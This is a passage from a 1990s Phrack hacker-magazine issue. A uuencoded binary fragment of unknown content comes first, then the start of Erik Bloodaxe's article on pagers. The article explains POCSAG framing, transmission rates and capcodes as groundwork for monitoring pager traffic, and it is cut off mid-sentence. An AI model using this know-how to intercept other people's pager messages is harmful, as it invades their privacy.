  6290. M?C_!_#C!^&'#_\'^?\'\?\'_O'C!X<'OP?_!X,'C,'!X<,'PP>/!X#Q\>#!@)
  6291. MP__!X'YXP>!SP>?!_,'PP?G!Y^7_S?_!\]#_P?!_P?_!^'O!X\'PP?\`P?C!>
  6292. M_\'PP?/!^\'@/\'_PC^>`!Q^'`!YP?!AP?_!X!Y^?\'^#,(?GGC!^,'#P>/!-
  6293. M_\'CP>?!XY_"_Q_!S,'^P?G!\\'A'\',?'_!_`@?'GC!_\'XP?#!^\'_P<?"6
  6294. MGS\SPO\_P?@`8\'YP<`#/\'P''_!^``>/QPXP?!@PO\?P<\_P?Q_P?^>>,'CX
  6295. MP<_!_P`#'CX8>&'!PQX,?'@88,/_P<9^,,'@`\'GP?C!\<'_P</E_\W_P??/D
  6296. M_\'^?G_&_\'?P?[%_W_!_\*_P=^'G\(?`\'_P?X'P?_!X!_"/\'_PQ^>/@/!W
  6297. MQ\'GP?_!P\''P>>/G\'_#PX>>\'SP>,/CCX_P?X.'QX<?\'\?,'_P=_!QY_"S
  6298. M'P/"_Q_!_@]GP?F"!Q^`'G_!_A["'PX8`'`?P?\?CQ_!_C_!_YX9P>?!S\'_F
  6299. M``\>/QY_P<?!PQ\./AP87L/_#C\;P>`#P<?!_,'"#\''Y?_=_\'^#G_4_S^?-
  6300. MC\+_#\'_P?X_P?\_P?_$'WX'P<_!Y\'_P>/!S\'GAQ_!_P\?#'_![0>/'CX_.
  6301. MP?\.'QX^?\'\?#[!SX>?PA\'PO\?P?X_P>?!^8_"'P\>?\'^?P\?#AP'?@_!Y
  6302. M_Q^//\'^/\'_'AO!YX_!_P8/'C\>?\''!Q\./CQ\?G_"_PX_!\'C@X?!_,'`C
  6303. M!\'/Y?_>_P?D_Y_!_P_$_\+OP<8?P?\&'P?!_\'^!X8?PC_!_P[#'W_!_CX'3
  6304. MP<<'C\(?AY_!_Q_!_C\GP>N/P<\?#QY_P?Y_CQ\/'Y_!_X?!_Q^//\'_/\'GF
  6305. M#P?!QX_!_P_!_Q]_C\'_P<('/PX^/W@.?\+_#C\'P<?!_\''P?_!P@?!Q^7_'
  6306. MWO\'\/\$?X?!_\'^#\'@/\'_/\'_'C\>/,'_P?P^`<'@#X_"'X>/P?\_P?X^/
  6307. M,<'APL?"'QY_P?Q_CQ\>/<+_P>?!_Q^//\'^/\'G'P/!YX_!_P_!_QY_G,'_;
  6308. MP<`'/PP^/,'X`'_"_X0_`\'GP?G!Y\'\P>"CP<?E____T/\_Q?_!^<G_P?W!5
  6309. M_\'AP?!_P>?"_\''P>_!_S_!_B!X8<'AP<<_*!A_P?C!_\'//3PXP?C!Y\'C2
  6310. MP?_"OS_!_S_!XY\!P>/!S\'_C\'_/G^8P?_!X<'_/[Q\>,'P8,/_P>!_(<'AC
  6311. MP?G!X\'XP?'!\,'CY?___]#_/]+_P?C$_\'/Q/_!X,'X0<'P#\'_P<`0P?_!Z
  6312. M^,'_P<^`/'APP>'!X\'_P=!^?\'_,\'CG\'#P>/!S\/_P?Y_N,'XP>/!]G_!Z
  6313. M_'QXP?#$_\'@?G'!X<'QP>/!\,'QP?#!X^7____0_W_<_\'PP?AQP?!_P?_!-
  6314. MX,'XP?_!^,+_P>#"?&'!\&?!_\'@?G_!_\'@=\'_PN/![\/_?GA\>,+S?GS"J
  6315. M>,'XP?S#_\'@?G'!\<'XP>/!^,'QP?#!\^7____H_S_'_\'YPO_!\<7_P<!_I
  6316. MP?X#P?`?P?_!X,)_P?_!P#_!W\''P>?!S\'_'\'_/P!^<,'QP<<('CAXPOC"7
  6317. M_\'/P<(^<<'AP?'!X\'XP?/!\,'CY?___^?_P?X?T__!W\'_G\7_P<8?G\'?F
  6318. MP?_!W\'_G\'_'X!^`\'P#X`?`#[!_AC"_\''AQX[PL/!Q\'\PO/!Q^7____H#
  6319. M_S_E_X_!_P_!_@^&'P1_P?X'P>?!_\'&#PQ_P<$'P<?!_,'S!\'/G^3_____;
  6320. M_];_C\+_#\'GP?_![Q^'P?_!Y@^/POX'P<\?Y/______VO_!]\3_P?W!_Y^/D
  6321. MP?[!_P_!S[_D_______:_\'SQ/_!^,/_P?S"_\'OY?_-_\CPP?'!\,/QP?#!$
  6322. M\<'Y___\_\'SQ/_!_L/_P?Y_Y__-_\'PQ6#'<,'P<,'PP?G!^,+_P?W!^___8
  6323. M^__!_L3_?^?_S?_!^\'XP?'!^,'P8,-`<,-``,-`Q`#"0&!PP_#!^,/[P__!*
  6324. M^______;_]'_P=_%GP\>#PX?#PK"!LH"!L,.PA\/PQ_!W______7_^+_PY\?O
  6325. MQ`\'#\D&#L(&RP^?O\'?O______%_^C_P=_#C\,/!P\'#\,'QP;&!\0/PX^?I
  6326. MP_^?PM_"_\'?___W__;_O\'_O\*?K\(/P@["!,(`!,4`!,0`!,(&!\,/CQ^_^
  6327. MPO^_PO^____L__W_P_W!\<+PP>#"8,D@Q@#$(,/@8,'@8,'@8,'@P?'!\,+YI
  6328. MPOW__^/_S?_!_F/!X,'WP?S"]\'@P?_!\,'\P?'!X,'WP?#!^,'\P?/#_\'WZ
  6329. MZ/_!^<+QP?C!\,'QP_#"X,+PP>#+8$#$8,7PP?'__]S_S?_!_'/!X,'WP?C!/
  6330. M\\'WP>#!_\'P?&'!X'?!X,'P?'/!_\'SP?_!\</_P?GK_\'XP?W!\,/XR/!P$
  6331. MP?#$<,5@<&##<,'PP?C!^<'[Q/W__]/_S?_!Q'O!W,'GP<QAP>9XP?_!PWS!;
  6332. M^YO!XQAP>$'!_@'!S@'!\<'_P?/!P'O!\X#!\'_#_\'XP?_!_L'Q]/_"^\'X@
  6333. MP?#"0,(`0,8`0,(`0'!@<,'PP?C"^</[P?G!^___Q?_-_\'.?Y_!YXY#P<8^$
  6334. MP?^/GL'_G\'F'G><&\'^`XX+P>/!]\'GP<`_P?<`8!_!_W\_P?X?P?X'G@_&T
  6335. M_\'?[_^?C@X/#@(.`LH`Q`+"!@\"!@X/PQ___\W_P<\/C\'GCD5.?\'_G\'.+
  6336. M'X_!YS_!_\'^/\'^/XX_P>'!Y\'#P?P_P?<>9Q_!_C\?,@_!_P^.#Y_!QC_"4
  6337. M[\'_!\'OA\'_?L(/PO\/PO_"#\'_/Y_"_\'?Y?\/CP_"'\</#L(&!,@&#L4/5
  6338. MPQ_U_\W_P<\'A\''CD<&?\'_'\'.#X?!YS_!YYX/P?\?CW_"Y\''P?_!]\'G@
  6339. M'F?!_\'^/AXWA\'_PH\/G\''/\'/P<?!SP?!QP?!_G["!\'_;@_!_W_"!\'_/
  6340. M'P_"_X_#_Y^/YO_#G\2/Q0\'P@_"!P;"!\,&PP?)#X\/PH^?Z/_-_\'/@\'\>
  6341. M)XY&!G0_O\',!X?!YG_!\`P!P?\'A\'_P>!GC<'\P?/!XQYGP?_!_#X.<\'S9
  6342. MP?^/PY_!S\'_P<QCP<X<9Q[!_#_"'\'^<!_!_CP'`,'@#@3!Y\'_@,'OP<_!4
  6343. M_!\'P>0_P>0_Q/_![Y_!_[^?P?^_Z_^_G\(/#`3+``0`P@8$!P\?OY^_G[_!T
  6344. M_\._VO_-_\'GP?'!^&?!S&0$<'^_P>PG@<'F?\'P.`'!_X&`P?#!X&?!R,'XK
  6345. MP?'!\R!@P?_!^#P,PO'"_\._P>_!_\'LP>'!YGQB?\'X?SY_P?YQP?_!_#TOX
  6346. MPN'!SC!AP>>@P>/![\'P?"'!X'_!X#W$_\'@.<'@?"/!_\'CP>#!_\'@PO_!P
  6347. M\<'YV?_!_<[_POW!\,/@Q&#!X,(@`"#%`,8@8,,@PF#!X,/QP?7!_=+_S?_!2
  6348. MX,'PP?AAP>!BP<!X?\'_P>S"_\'R?\'QP?C!\<'_P?#!P,'P8&/!P,'XP?'!$
  6349. M\P#!\'_!\<'\8,+QQ?_!X,'_P=S!\,'F?&!_P?!_?G_!_G'!_\'X/\'_P?/!0
  6350. MX\'B>&#!\\'_P?'!_\'QP?C!\,'@P?_!X,'YP?_!Q\'N?L'P>,'@P?C!\\'\T
  6351. M8<'@?\'@?F/!X,'P?,'_P?##_\'\P?/1_\'\VO_!^<'PP?C'\,'@P?#!X'!@O
  6352. MP>#$8'#&8,'@P?#/_\W_P>#!\'APP?ACP>!X?\'_P?S"_\'P?L'QPOC!_L'XA
  6353. MP>#!^'#!XV#!^,'QP?-PP?#!_\'PO'#"\<7_P>!_P?C!\,'V?&!_P?!_?G_!)
  6354. M_'#!_\'X?\'_P?/![\'@>&#!]\'_P?!_P?'"^,'WP?_!\<'YP?_!Y\'\?,+X4
  6355. MP>#!^,'_P?QQP>#!_\'@?'/"\'S!^<'@?\+_P?AQT?_!_.#_P?O!^<']POG%&
  6356. M^,3PP?C#\'#!\,-@S__-_\'L`<'`<!S!Y\''@'_!P#S"_\'W@'#"^,'\>,'$7
  6357. M>&/!PP#!^,'QP?-\<\'_P?`<<'/!\<'_P]^?P>'!_\'<P>)&?F)_P?`_?@/!1
  6358. M_G`?P?C!W[_!\\'/P>(`8&.!P?A_P?#!^<'\9\'?P>/!V<'_`\'.'L'\P?G!)
  6359. MY\'XP?_"^,''P=_!Y\'&PO_!\\'X><'@'X_!S\'X`-'_P?W!_\'QP?_!_L'[8
  6360. M[__!^\'XP?G/_\W_P<\'@GH>P>^/@'_!P!_!_Y_!YX)R'L+^'8X>)X<.?\'[5
  6361. MP<<^9\'_P>`.,'/!\\'_Q)_!S\'_GD8&?D9_P>(?/@_!_@(?P?G"'\''C\'FP
  6362. M`$('`L'\/\'P&<'^1Q_![Q_!_P?!SA[!_L'YP<?!_!_!_L']CY_!QX[!_Q_!O
  6363. M_\'\?<'/'P^/'QY_TO^#P?_!_@>/___!_\[_G\7_P<_&_X_!_@_"_P?!SP9O0
  6364. MP<_"/\'^#SYG'\'GCCPSA\'_PH^?'\'/P?^.9P\^!S]`'\(_P?XOP?_!^`\?U
  6365. MP>>/P<8.9P</P?Y_P?(=P?X$'\'@'\'_%\'.#G]]P<8\#\'_P?X''\'/P<;")
  6366. M#\'G/!W"CP^''\(_TO\./Q_"#___P?_=_P_"_P_!WX=_P>_"?\'_#\'_9A_!*
  6367. MY\'./C</P?^/PI\/P<_!_X[![X\>1Q\'#\(_P?XGP?_!X@\?P>>/A@Y'!X_!C
  6368. M_L'_P?>_P?X''\'''\'_!\'.#\+_ASX/PO\&'\'/AL('P<8>'\*/!X>?'S_2P
  6369. M_P\^'\(/___!_^C_O\+_'\/_P?P/P?_!WY^_A<'`/Y[!_XX!P>>,PL\_#\'^[
  6370. M?\'_P>>/G\'GP<>&/F>'G\'^P?_!]\']P?[!QY_![\'_P?X!P<YDP?[!_<''"
  6371. MP?R_P?W!_(<?P>?!Q@\'P>0\B<'/C@>/G\(_TO^?/A^/'___P?_O_\']Q?_!@
  6372. MX<'@/\+_P>\!P??!X<'OPO\AP?[!]\'_P>?![\'_P>?!X(Y\8\'GN<'\P?_!&
  6373. M\\'XP?G!Y\'_P>_!^<'\(,'NP?#!_,'YP>?!^,'_P?C!_<'GO\'GP>3!_[_!J
  6374. MX<'XP>'![\',(\'YO\(_T/_!_<'_OSR?P?\____!__7_P?/!^<3_P??!_\'S+
  6375. MP__!\</_P??#_\'P?L'^P?/!Y\'`P?S!_\'SP?QQP>?!_\'GP?C!_,'PP>S!:
  6376. M\,+XP>?!^,'_P?C!\<+_P>/!Y,+_P?/!^,'AP?_!T`'!^#_!_W_0_\']PO_!+
  6377. M^,+_P<#__\'____*_\'XQ/_!\,'\P?_!\\'^<</_P?A\P?C!_,'XP?S!^,'_]
  6378. MP?C!_\'XP?'"_\'@?,+_P?'!^,'QP?_!^''!_,-_T/_!_<'_P?YXPO]@___!&
  6379. M____S__!^\C_P?QOP?[#_\'YP?_!_<'_P?X#PO_!X'X#P?_!\'C!\<'@&,'Y;
  6380. MP=S#/]#_P?W!_SX8#\'?F___P?___^/_#\+_P>8^!\'_P?`?P?O!PAO!_Y\?K
  6381. MPC_2_QX8#Y\?___!____Z_\?P?_![W_!_\'?/[\_TO\>/P>/#___P?____/_R
  6382. M/]+_#V?!YY\/___!_______%_\']P?^'P_^$___!_______%_\']___'____G
  6383. M___%_\']___'_______%_\']___'_______%_\']___'_________\W_____L
  6384. M____S?_________-_______%_\']___'_______%_\']___'_______%_\']1
  6385. M___'_______%_\']___'_______%_\']___'_________\W_________S?__W
  6386. M_______-_______%_\']___'_______%_\']___'_______%_\']___'____%
  6387. M___%_\']___'_______%_\']___'_________\W_________S?_________-]
  6388. M_______%_\']___'_______%_\']___'_______%_\']___'_______%_\']`
  6389. M___'_______%_\']___'_________\W_________S?_________-________T
  6390. M_\W______\7_P?W__\?______\7_P?W__\?______\7_P?W__\?______\7__
  6391. MP?W__\?_________S?_________-_________\W______\7_P?W__\?_____\
  6392. M_\7_P?W__\?______\7_P?W__\?______\7_P?W__\?______\7_P?W__\?_P
  6393. M________S?_________-_________\W_________S?______Q?_!_?__Q___5
  6394. M____Q?_!_?__Q_______Q?_!_?__Q_______Q?_!_?__Q__________-____$
  6395. M_____\W_________S?_________-_______%_\']___'_______%_\']___']
  6396. M_______%_\']___'_______%_\']___'_________\W_________S?______O
  6397. M___-_________\W______\7_P?W__\?______\7_P?G__\?_SO_!^?__]?_!2
  6398. M_?__Q__._\'YP?O___3_P?W__\?_S?^&`@`"`,D"Q`8.Q1\/P=______Y?_-X
  6399. M_X\'Q08.Q@;$!,(&PP\.PP\?G______B_]#_P=_"G\/_P<^_G\*/#X_&#\T'0
  6400. MQ0_"C\.?P?^/_____]#_X/^_PO^_PH\/!L0$QP`$P@8'P@^/GX^______\__J
  6401. M[/_!_<+YPO'!^,'QP?#!X"#!X,(@P@#)(,)@P?'!X<'@P>'!\<']]__!_?__$
  6402. MQ__S_\'[QO#!X,'PP>#&8$!@0,)@P>!@P>#!\,+QP?#!_\']\O_!_?__Q__-Q
  6403. M_\'\P?_!\<3_P?/!_\'PP?S!^\'YP?_!^<'XP?W?_\+]P?_"^</XQO#%<,)@_
  6404. MQ'#&\,']P?_#^,'[P?W"^=[_P?G__\?_S?_!_`_!X<3_P</!_\'PP?Q[P>'!K
  6405. M_\'AP?#!_>O_P?/!\,)@0'#$0,8`0&!`PG#!^&#"X,/PP?O!_\+[VO_!^?__A
  6406. MQ__-_XX'!L''CL''P<\.P?^&'`<&P<X"P>(<!QX/P__!_G\^#\+_P?X?P=_!8
  6407. M_Q_!W^;_PM^>P@_##LD"`,("Q@8/#A^?P=___];_S?\,#PY/CD>/#\'_CQ["N
  6408. M#XX.9QP''`_!_W_!_\'^/SX/PO_!_@^/P?X/C\+_'^;_G\+?GQ_'#\,.R`8.-
  6409. M!@\'Q0_#'\'_O___S?_-_XX?#\''CD>./\'_'X_!_Q_!SA_!Y\'_P?>_C\'^G
  6410. M/\'^?L(_C\'_P>?!_P>&,P\'P<8>!\'_P<_![\'_!\'_P<_"_X_"_\'/ZO_#9
  6411. MC\(/C\0/P@?$!@?"!L,'PP^/P@_"CY_!W___P?_-_XP_#\''C&&&?\'_/XS!6
  6412. M_Q_!SG_!Y\']P?/!_<'_P?P]P?A^/CS"_\'AP?F'C#`'#\'`'`?!_X_!Y\'OO
  6413. M`\'_A<+_A\+_P<;&_[_!_[_J_[^?CP["!@`$QP`$P@#"!,(&P@___\W_P<PCY
  6414. MP>#!YXC!X,'D<,'_O\'L)@'!Y,'_P>!XP>'!^,'_P?@YP?!^PCS"_\'@P?G!B
  6415. M\;\QP>,_P>/!^,'SP?_!Q\'AP><XP?_!X&?!Y[!YP?/!P,'_P>_"^<'OP><AK
  6416. MP?`X(_'_P_W!\,'YP?'!\,'@8"!@Q"``PR#&8,/@Q&#!X"#"8,'@P?##^>;_%
  6417. MS?_!W,'CP>#!Y\'8P>#!P'#"_\'L8@#!Y,'_P>!P8\'X?\'X><'P?,(XPO_!/
  6418. MX,'YP?'!_\'QP>-_P>/!^,+_P</!X<'G>,'_P?AGP>;!^'#!\\'QP?_!S\'Y@
  6419. MP?'!Q\'F(,'P>&/Y_\'XP?G'\,'@8,'@Q6!`PV#%0,(`0&!PP>!@PN#$\,+Q2
  6420. MPO#<_\W_P?G!\<'X9\'XP>8@>,+_P?S!_GG!Y,'^P?#!^,'SP?[!X\'XP?'!2
  6421. M\'QP>'_!_\'@><'YP?_!\&,PP?#!^'_!_\'QP?#![GQ_P?Y@P>9^>,'SPO_!R
  6422. MX\'XP?'!Y\'F>,'QP?C!\?__Q?_!^<'PP?S!\,'YP?C!\,/XS?##<&!PQ&!P;
  6423. M8,)PPO##^=/_S?_!R<'SP?QGF,'F`'Q_/\'<P?]_P>3!_L'CP?C!\\'_P>/!!
  6424. M^<'!P>`^0#AOP?_!P'G!^;^P`P#!\'@/P?^QP>#![WY_P?Y@P<9^>,'SP=_!B
  6425. M_\'#N<'QAX9XP?/!^,'S___:_\'[P?_!^\'PP?/!X,'PPF##0,4`0,)@<,'Y[
  6426. MP?O0_\W_P<X#'@<>P<>&''^/'L'_'\'.'F?!_\'[P?_!]\'_P<'!PA[!PSS"4
  6427. M_X`[P?N?$X<?P?\?@\'_`<'N#\(_@$`.?QL3@L'_@YG!^X<'#,'WP?S!T___6
  6428. MYO_!W\(?'@X&Q@+/_\W_C@<,)QY/CPQ_CS_!_S^/#V>_PO_!Y\'_P>.''L''<
  6429. M/\+_A#_!_Y\WP<\?P?\?A\'^`<'O#\(_AT<.?QL7A\'_#QW!_X</!<'G/`?_J
  6430. M_^O_O\0/#@?/_\W_P=\/A\'O'\'OCX?!_\''/\'_O\'/!\'F#\'_P?X'PO_".
  6431. MC\''/@_!_X\?AY\WP<<?P<^/P?_!_@?![P_"/X_!Q\'//Q^'C\'_CQ_!_X</_
  6432. M!L'G/@?___'_P=_/_\[_O\'OP?]_PO^/P?_![\3_A\'@'\'_P?X/PO^?P=_!8
  6433. MYSP'P?^?N`>,-\'G#\''F<'QP?X(P>\//G^?P>?![CX[@Y_!_YP=P?N0+QS!Z
  6434. MY\'\!______"_]S_P?W)_\'\8\+_P?AGP>#!^\'S`,'@."'"_,'OP<\@PO_"`
  6435. MYSAYP>/"_\'\.,'QF&=\P?/!^,'S_____\+_ZO_!^,'_P?'!_\'WP>#!\'QG4
  6436. MPOS!_\'O8,+_PO?!X,'[P>/!X,'_P?YXP>'!^,'F>,'SP?#!\______"__?_W
  6437. MP?O$_\'PP?O!\\'@P?_!_L'X8\'XP?9PP?#!^,'S_____\+____!\,+_P?X?$
  6438. MP?W!_P#!\#G!^______"____Q/_!W\+_P=_!_A______P__________-____J
  6439. M_____\W_________S?_________-_________\W_________S?_________-R
  6440. M_________\W_________S?_________-_________\W_________S?______D
  6441. M___-_________\W_________S?_________-_________\W_________S?__R
  6442. M_______-_________\W_________S?_________-_________\W_________>
  6443. MS?_________-_________\W_________S?_________-_________\W_____R
  6444. M____S?_________-_________\W_________S?_________-_________\W_R
  6445. M________S?_________-_________\W_________S?_________-________]
  6446. M_\W_________S?_________-_________\W_________S?_________-____R
  6447. M_____\W_________S?_________-_________\W_________S?_________-R
  6448. M_________\W_________S?_________-_________\W_________S?______D
  6449. M___-_________\W_________S?_________-_________\W_________S?__R
  6450. M_______-_________\W_________S?_________-_________\W_________>
  6451. MS?_________-_________\W_________S?_-_\,/PA_"GS_!_\*?______3_'
  6452. MS?_#!\4/Q(_$G\'_G[_"W______J_\W_CL($T``$`,,$`,(&P@["#Q^_G[_"R
  6453. M_\*______]C_S?_!^,'PP>!@Q"!@Q2``(,H`PB``PR#!X&!QP?#"X<'QP_W_@
  6454. M____U?_8_\'[PO_!^\'_P?G!_\'PP?',\&#"X,1@0,1@P>#!\,'@Q?#_____F
  6455. MR__@_\']P?_!_<'XP?W#^,'YP?S"^,3PQ'!@<,1@<&#"<&##<,'XPOG!_?__G
  6456. M___&__O_P?O!^,/P8,'`0,@`PF#!\&!XP?#!^?__^?_]_\+?PI^/#L("``+%.
  6457. M`,,"!@(.'@^?PM____3____)_[^?Q0\.PP\.R`8.!LH/PA_!_\'?P[___]S_7
  6458. M___,_X^?PX\/CP^/#\,'QP8'PP;%!\0/C\(/C___V____]S_O\'_OY^_P?^/'
  6459. MP@\&Q`3'``0`!`7"#Y\?PK___]'____A_\']P?O"_\']POE@P?#!X,)@QB#"1
  6460. M`,4@8,'AP>#"\</]___*____P__!]^__POG%\,9@PD#"8,'@8,'PP>#!\,)@\
  6461. MP>#(\,'QP_#!\\'YP__!^>W____"_\'^<\/_P?GM_\3XPO!PP?!PP?##<,I@I
  6462. M<,5@QW#&\,+XP?#!_\'YP?O!_<'YY/___\+_P?1SP__!P'_!_<+_P?G!\'_!D
  6463. M_`'&_\'XZ__"^<'_P?O!^,'[P?_!^\'XPO!PPD#"8,-``,=`S`##0,'@<,'[<
  6464. MP?G:____PO_![G_#_XX_Q/_!\'_!_@/&_\'^'_;_PI_"WY\?P@X>#QX?'A\.<
  6465. MP@8"#L4"Q0#"`@#"`@X?#\*?U?___\+_P<X?A\'G?Y\?P?["_\'\9\'_P?X_<
  6466. MPO\_PO_![\'_#\;_/\'&'\/_AW_)_\'?]O^_GQ^?'\(/PP[(!@["#\_____"N
  6467. M_\'.#X?!QW^/'\'?P<?!_\'J9\'_P?[!_\'/P?\_PO_![\'_A\'_G\3_/\''O
  6468. M'\/_AW_)_X_]_\'OPH_$#\,'PP8'S____\+_P<\'C`8_A#>,P<9_P>1@?\'^0
  6469. M'X3!P#@<9,'GP?_!]\'_G[\?P?\^/\'/G\'_P?Y_CG_$_\'?Q/\`Q?\'P?_!&
  6470. M[\'_P>?^_Y_"O\_____"_\'OP>&`8'^`<\'(P<!_PN!_P?PCP<#!X#`X8,'GS
  6471. MP?'!\\'_O3P_P?Q^?\'OP?W!_\'\P?^\><'_P?O!_\']Q?\PQ/_!_B'!_\'CK
  6472. MP?_!X,3_P?G__\S____"_\'OP?B`P>#!_\'0<\'HP<!_P>#!_L'_P?QSP<!/Q
  6473. M(+G!^&?!\$/!\<'XP>#!_\'XP?9_P?_!_,+FP?_!^''"X,+P/<'_P?C"_\'\#
  6474. MPO!_P?_"^,'_P?'!_\'@?\/_P?#!Y___R____\+_P>S!^,+PP?_!^'/!^,'@Z
  6475. M?\'@PO_!_'-`?F`YP?AGP?!C<<'XP>#!_\'XP?Y_P?_!_,'^P?;!_\'P<<'PQ
  6476. MP>#!\'`]P?YX?\'_P?S"\#Y_P?C!^<'_P?'!_\'\?\'YPO_!\,'G___+____*
  6477. MPO_!S''!V,'APO\SP<C!S\'_P<!_O\'\P?\!P<\@P?G!X&?!\<'C><'8!E_!"
  6478. M\<'F?\'_P?S!\,'F?X#!Y[S!W\'@(\'(P>9YP=_!_P#!X&'!S&?!^<+_P>/!/
  6479. M_\+?P?!X?\'SP>?!S\'_P>?!\G___\;____"_\'.`X_!SG\?$PS!S\'_@'^?F
  6480. MP?[!_Q_!SP?!^\'&9\'[P<<[G`X?P>?!YG^?P=[!YL'.?X?!YQX?P<8'C\'&Z
  6481. M.9_!_P+!W@>>'\/_A\'_PI_!PG@?P??!QP_!_P<&'P]____$____PO_!SP_!K
  6482. MS\'OP?^?/@_!QG_!_V8?PO^.P<XO'XXGP?_!]S\/P=^'P?_!SW_!SXYWP>Y_V
  6483. MG\'O'@_!Q@^/P<=X#\'_#\'L#Y\/P_^'P?_"C\'/'X_!_@8'/P?"#@<?___$R
  6484. M____PO_![X_%_Q_!Y\+_P>8_PO^'P<8O'XXGP?_!YP?"CX?!_X]_P<\.=\'.&
  6485. M?Y_![QX/P<\/C\''?Q_!_Q_!Q@^?#\/_!\'_PH_!SY^/P>(&!R<'P@X''___C
  6486. MQ/___]3_?\'G?\'_P?<#G`X/P?P?P?_!QA[!\\'N?Y_!YXR.P<<G#,'&><+_R
  6487. MOXPGG\''P_\0P?^?C\'/EX_!\00#!@,^'@<?___$____V?_!X\'\/#_!^#_!P
  6488. M_\'P?\'QP?["_\'GP>'"X'`\P>9XP__!P&?!_<'GP?S!^,'_<,/_P>^QP>_!-
  6489. M\<'D(R0#/``GO___Q/___^#_P?G&_\'QP_!\=L'X?,+_P>!WP?QGP?QPP?_!S
  6490. M\,'_P=C!_\'FP?/!_\'SP>#!_\'$?\'_P>#__\;____H_\'YPOC!_L'_P?QXE
  6491. MPO_!\,'_P?QWP?YAP?_!\,'_P>!_P?![P?_!\\'PP?/!_'O!_,'@P??__\7_&
  6492. M___X_\'CP?_!X,'_P?!_P?_!\\'^`\'?`SQ&1___Q?______PO\/P?\/OA\/1
  6493. M/___Q/______R/]____$_________\W_________S?_________-________S
  6494. M_\W_________S?_________-_________\W_________S?_________-____R
  6495. M_____\W_________S?_________-_________\W_________S?_________-R
  6496. M_________\W_________S?_________-_________\W_________S?______D
  6497. M___-_________\W_________S?_________-_________\W_________S?__R
  6498. M_______-_________\W_________S?_________-_________\W_________>
  6499. MS?_________-_________\W_________S?_________-_________\W_____R
  6500. M____S?_________-_________\W_________S?_________-_________\W_R
  6501. M________S?_________-_________\W_________S?_________-________]
  6502. M_\W_________S?_________-_________\W_________S?_________-____R
  6503. M_____\W_________S?_________-_________\W_________S?_________-R
  6504. M_________\W_________S?_"'Y_"W________\C_S`\?G\'_O]/_PI_#_\*_2
  6505. MSI_#O\'_QI^_RY^_PI^_G[_!_\6?P[^?O___[/_)!\@/C\*?Q?_(GX^?_X^/'
  6506. MPY^/G\*/R)_!WY_"W\'_P=___]/_WP3&!@?'!L0$Q08'Q0\'PP8'#P</!\0/1
  6507. /!]0/C\2?C\F?SK___]#_K
  6508. ``
  6509. end
  6510. sum -r/size 36774/43500 section (from first encoded line to "end")
  6511. sum -r/size 656/73815 entire input file
  6512.                               ==Phrack Magazine==
  6513.  
  6514.                   Volume Five, Issue Forty-Six, File 8 of 28
  6515.  
  6516. ****************************************************************************
  6517.  
  6518.  
  6519.                      The Wonderful World of Pagers
  6520.  
  6521.                             by Erik Bloodaxe
  6522.  
  6523. Screaming through the electromagnet swamp we live in are hundreds of
  6524. thousands of messages of varying degrees of importance.  Doctors,
  6525. police, corporate executives, housewives and drug dealers all find
  6526. themselves constantly trapped at the mercy of a teeny little box:
  6527. the pager.
  6528.  
  6529. Everyone has seen a pager; almost everyone has one.  Over 20 million
  6530. pagers are on the streets in the US alone, sorting out their particular
  6531. chunk of the radio-spectrum.  Another fifty-thousand more are
  6532. put into service each day.
  6533.  
  6534. But what the hell are these things really doing?  What more can we
  6535. do with them than be reminded to call mom, or to "pick up dry-cleaning?"
  6536.  
  6537. Lots.
  6538.  
  6539.  
  6540. ** PROTOCOLS **
  6541.  
  6542. Pagers today use a variety of signalling formats such as POCSAG, FLEX
  6543. and GOLAY.  The most common by far is POCSAG (Post Office Standardization
  6544. Advisory Group), a standard set by the British Post Office and adopted
  6545. world-wide for paging.
  6546.  
  6547. POCSAG is transmitted at three transmission rates--512, 1200 and 2400 bps.
  6548. Most commercial paging companies today use at least 1200, although many
  6549. companies who own their own paging terminals for in-house use transmit
  6550. at 512.  Nationwide carriers (SkyTel, PageNet, MobileComm, etc.) send
  6551. the majority of their traffic at 2400 to make the maximum use of
  6552. their bandwidth.  In other words, the faster they can deliver pages,
  6553. the smaller their queue of outgoing pages is.  Although these
  6554. carriers have upgraded their equipment in the field to broadcast at
  6555. 2400 (or plan to do so in the near future), they still send out
  6556. some pages at 1200 and 512 to accommodate their customers with older
  6557. pagers.  Most 512 and 1200 traffic on the nationwide services is
  6558. numeric or tone-only pages.
  6559.  
  6560. POCSAG messages are broadcast in batches.  Each batch is comprised of 8
  6561. frames, and each frame contains two codewords separated by a
  6562. "synchronization" codeword.  A message can have as many codewords
  6563. as needed to deliver the page and can stretch through several batches
  6564. if needed.  The end of a complete message is indicated by a "next address"
  6565. codeword.  Both addressing and user data are sent in the codewords, the
  6566. distinction being the least significant bit of the codeword:
  6567. 0 for address data, and 1 for user-data.
  6568.  
  6569. Standard alphanumeric data is sent in a seven-bit format, with each codeword
  6570. containing 2 6/7 characters.  A newer 8-bit alphanumeric format is
  6571. implemented by some carriers which allow users to send data such as
  6572. computer files, graphics in addition to regular alphanumeric messages.
  6573. The 8 bit format allows for 2.5 characters per codeword.
  6574.  
  6575. Numeric data is 4 bit, allowing up to 5 numbers to be transmitted per
  6576. codeword.  Tone and voice pages contain address information only.
  6577.  
  6578. (NOTE:  Pager data uses BCH 32,21 for encoding.  I don't imagine
  6579.  very many of you will be trying to decode pager data by building your
  6580.  own decoders, but for those of you who may, take my interpretation
  6581.  of POCSAG framing with a grain of salt, and try to dig up the
  6582.  actual POCSAG specs.)
  6583.  
  6584. ** THE PAGING RECEIVER **
  6585.  
  6586. Paging receivers come in hundreds of shapes and sizes, although the vast
  6587. majority are manufactured by Motorola.  Numeric pagers comprise over
  6588. fifty percent all pagers in use.   Alphanumeric comprises about thirty
  6589. percent, with tone and voice pagers making up the remainder.
  6590.  
  6591. Pagers are uniquely addressed by a capcode.  The capcode is usually six
  6592. to eight digits in length, and will be printed somewhere on the pager
  6593. itself.  Many pager companies assign customers PIN numbers, which are
  6594. then cross-referenced to a given capcode in databases maintained by
  6595. the service provider.  PIN numbers have no other relationship
  6596. to the capcode.
  6597.  
  6598. Tone pagers are by far the most limited paging devices in use.
  6599. When a specified number has been called, an address only message
  6600. is broadcast, which causes the intended receiver to beep.  Wow.
  6601. Tone pagers usually have 4 capcodes, which can correspond to
  6602. different locations to call back.  Voice pagers are similar, except
  6603. they allow the calling party to leave a 15 to 30 second message.
  6604. The voice message is broadcast immediately after the capcode of the
  6605. receiver, which unsquelches the device's audio.
  6606.  
  6607. Numeric pagers, although seemingly limited by their lack of display
  6608. options have proven otherwise by enterprising users.  Most numeric
  6609. data sent is obviously related to phone numbers, but numerous users
  6610. have developed codes relating to various actions to be carried out
